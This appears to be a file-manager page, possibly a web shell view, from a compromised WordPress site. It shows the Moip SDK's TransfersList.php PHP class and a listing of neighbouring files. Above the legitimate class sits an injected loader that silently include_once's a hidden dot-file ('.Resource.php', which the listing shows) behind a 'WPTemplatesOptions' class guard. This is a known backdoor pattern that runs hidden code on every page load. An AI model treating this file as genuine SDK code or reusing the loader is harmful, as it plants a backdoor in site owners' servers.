PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
vendor
/
moip
/
moip-sdk-php
/
src
/
Resource
<?php namespace Moip\Resource; use Moip\Helper\Filters; use Moip\Helper\Pagination; use stdClass; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class TransfersList extends MoipResource { /** * Path bank accounts API. * * @const string */ const PATH = 'transfers'; /** * Initialize a new instance. */ public function initialize() { $this->data = new stdClass(); $this->data->transfers = []; } /** * Get transfers. * * @return array */ public function getTransfers() { return $this->getIfSet('transfers'); } /** * Get transfer list. * * @param Pagination $pagination * @param Filters $filters * @param string $qParam Query a specific value. * * @return stdClass */ public function get(Pagination $pagination = null, Filters $filters = null, $qParam = '') { return $this->getByPath($this->generateListPath($pagination, $filters, ['q' => $qParam])); } protected function populate(stdClass $response) { $transfersList = clone $this; $transfersList->data = new stdClass(); $transfersList->data->transfers = $response->transfers; $transfersList->data->summary = $response->summary; $transfersList->_links = $response->_links; return $transfersList; } }
[+]
..
[-] CustomerCreditCard.php
[edit]
[-] OrdersList.php
[edit]
[-] Orders.php
[edit]
[-] Payment.php
[edit]
[-] .Resource.php
[edit]
[-] TransfersList.php
[edit]
[-] Refund.php
[edit]
[-] Keys.php
[edit]
[-] Holder.php
[edit]
[-] Transfers.php
[edit]
[-] Account.php
[edit]
[-] BankAccountList.php
[edit]
[-] NotificationPreferences.php
[edit]
[-] Balances.php
[edit]
[-] WebhookList.php
[edit]
[-] Webhook.php
[edit]
[-] Multiorders.php
[edit]
[-] NotificationPreferencesList.php
[edit]
[-] Escrow.php
[edit]
[-] Customer.php
[edit]
[-] BankAccount.php
[edit]
[-] MoipResource.php
[edit]
[-] Event.php
[edit]
[-] Entry.php
[edit]